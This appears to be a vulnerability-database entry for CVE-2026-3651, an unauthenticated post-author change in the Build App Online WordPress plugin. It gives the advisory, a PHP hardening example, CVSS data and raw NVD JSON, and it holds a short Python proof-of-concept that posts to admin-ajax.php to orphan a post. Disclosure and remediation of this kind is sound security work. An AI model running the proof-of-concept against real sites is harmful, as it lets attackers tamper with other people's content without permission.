Security Vulnerability Report
CVE-2026-3651 CVSS 5.3 MEDIUM

CVE-2026-3651

Published: 2026-03-21 04:17:34
Last Modified: 2026-04-24 16:27:44

Description

The Build App Online plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 1.0.23. This is due to the plugin registering the 'build-app-online-update-vendor-product' AJAX action via wp_ajax_nopriv_ without proper authentication checks, capability verification, or nonce validation in the update_vendor_product() function. The function accepts a user-supplied post ID from the request and calls wp_update_post() to modify the post_author field without validating whether the user has permission to modify the specified post. This makes it possible for unauthenticated attackers to modify the post_author of arbitrary posts to 0 (orphaning posts from their legitimate authors), or for authenticated attackers to claim ownership of any post by setting themselves as the author.
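The description identifies three missing controls on one AJAX handler: no nonce validation, no authentication (the action is also exposed via wp_ajax_nopriv_), and no object-level authorization before wp_update_post() rewrites post_author. The following PHP is an added illustration of how such a handler is hardened in WordPress; it is not the plugin's code, and the function name bao_update_vendor_product, the nonce action name, and the request field names are assumptions made for this example.

```php
<?php
// Added illustration, not the Build App Online plugin's code. Function name,
// nonce action name and request field names are assumptions for this example.

// Register for logged-in users only. Not registering the wp_ajax_nopriv_
// variant removes the unauthenticated path described in the advisory.
add_action( 'wp_ajax_build-app-online-update-vendor-product', 'bao_update_vendor_product' );

function bao_update_vendor_product() {
    // 1. Nonce validation: rejects cross-site forged requests. check_ajax_referer()
    //    terminates the request itself when the nonce is missing or invalid.
    check_ajax_referer( 'bao_update_vendor_product', 'nonce' );

    // 2. Authentication: wp_ajax_ already implies a logged-in user; be explicit anyway.
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( array( 'message' => 'Authentication required.' ), 401 );
    }

    // 3. Input validation: the post ID must be a positive integer naming an existing post.
    $post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : 0;
    $post    = $post_id ? get_post( $post_id ) : null;
    if ( ! $post ) {
        wp_send_json_error( array( 'message' => 'Unknown post.' ), 404 );
    }

    // 4. Object-level authorization: the caller must be allowed to edit THIS post.
    //    'edit_post' is a meta-capability; for another user's post it resolves to
    //    edit_others_posts, so a plain subscriber or customer is refused here.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden.' ), 403 );
    }

    // 5. Author handling: never write a raw request value into post_author.
    //    Default to the current author; 0 (orphaning) is rejected; reassigning
    //    to someone else requires an existing user and edit_others_posts.
    $current_author = (int) $post->post_author;
    $new_author     = isset( $_POST['post_author'] )
        ? absint( wp_unslash( $_POST['post_author'] ) )
        : $current_author;

    if ( $new_author === 0 || ! get_userdata( $new_author ) ) {
        wp_send_json_error( array( 'message' => 'Invalid author.' ), 400 );
    }
    if ( $new_author !== $current_author && ! current_user_can( 'edit_others_posts' ) ) {
        wp_send_json_error( array( 'message' => 'Cannot reassign author.' ), 403 );
    }

    $result = wp_update_post(
        array(
            'ID'          => $post_id,
            'post_author' => $new_author,
        ),
        true // return a WP_Error on failure instead of 0
    );

    if ( is_wp_error( $result ) ) {
        wp_send_json_error( array( 'message' => $result->get_error_message() ), 500 );
    }

    wp_send_json_success( array( 'post_id' => $post_id, 'post_author' => $new_author ) );
}
```

The client side must send a nonce created with wp_create_nonce( 'bao_update_vendor_product' ) in the 'nonce' field; without it check_ajax_referer() ends the request before any of the later checks run. Steps 4 and 5 are the ones that address CWE-862 directly: being logged in is not the same as being allowed to change a particular post, and the author field in particular should never be taken from the request unchecked.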

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Build App Online <= 1.0.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL of the vulnerable WordPress site
target_url = "http://example.com/wp-admin/admin-ajax.php"

# Payload data
# post_id: The ID of the post to be modified
# post_author: The ID of the user to set as author (0 to orphan, or specific user ID)
payload = {
    "action": "build-app-online-update-vendor-product",
    "post_id": "1",
    "post_author": "0"
}

try:
    # Sending POST request without authentication
    response = requests.post(target_url, data=payload)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response:", response.text)
    else:
        print("[-] Request failed with status code:", response.status_code)
except Exception as e:
    print("[-] An error occurred:", str(e))

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-3651",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-21T04:17:34.023",
    "lastModified": "2026-04-24T16:27:44.277",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Build App Online plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 1.0.23. This is due to the plugin registering the 'build-app-online-update-vendor-product' AJAX action via wp_ajax_nopriv_ without proper authentication checks, capability verification, or nonce validation in the update_vendor_product() function. The function accepts a user-supplied post ID from the request and calls wp_update_post() to modify the post_author field without validating whether the user has permission to modify the specified post. This makes it possible for unauthenticated attackers to modify the post_author of arbitrary posts to 0 (orphaning posts from their legitimate authors), or for authenticated attackers to claim ownership of any post by setting themselves as the author."
      },
      {
        "lang": "es",
        "value": "El plugin Build App Online para WordPress es vulnerable a acceso no autorizado en todas las versiones hasta la 1.0.23, inclusive. Esto se debe a que el plugin registra la acción AJAX 'build-app-online-update-vendor-product' a través de wp_ajax_nopriv_ sin las comprobaciones de autenticación adecuadas, verificación de capacidades o validación de nonce en la función update_vendor_product(). La función acepta un ID de publicación proporcionado por el usuario de la solicitud y llama a wp_update_post() para modificar el campo post_author sin validar si el usuario tiene permiso para modificar la publicación especificada. Esto hace posible que atacantes no autenticados modifiquen el post_author de publicaciones arbitrarias a 0 (dejando las publicaciones huérfanas de sus autores legítimos), o que atacantes autenticados reclamen la propiedad de cualquier publicación al establecerse a sí mismos como el autor."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-862"}]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/build-app-online/tags/1.0.23/admin/class-build-app-online-admin.php#L556", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/build-app-online/tags/1.0.23/admin/class-build-app-online-admin.php#L565", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/build-app-online/tags/1.0.23/includes/class-build-app-online.php#L233", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/build-app-online/trunk/admin/class-build-app-online-admin.php#L556", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/build-app-online/trunk/admin/class-build-app-online-admin.php#L565", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/build-app-online/trunk/includes/class-build-app-online.php#L233", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/51564b26-0d7c-4499-9f5a-84f76c5a5e8a?source=cve", "source": "[email protected]"}
    ]
  }
}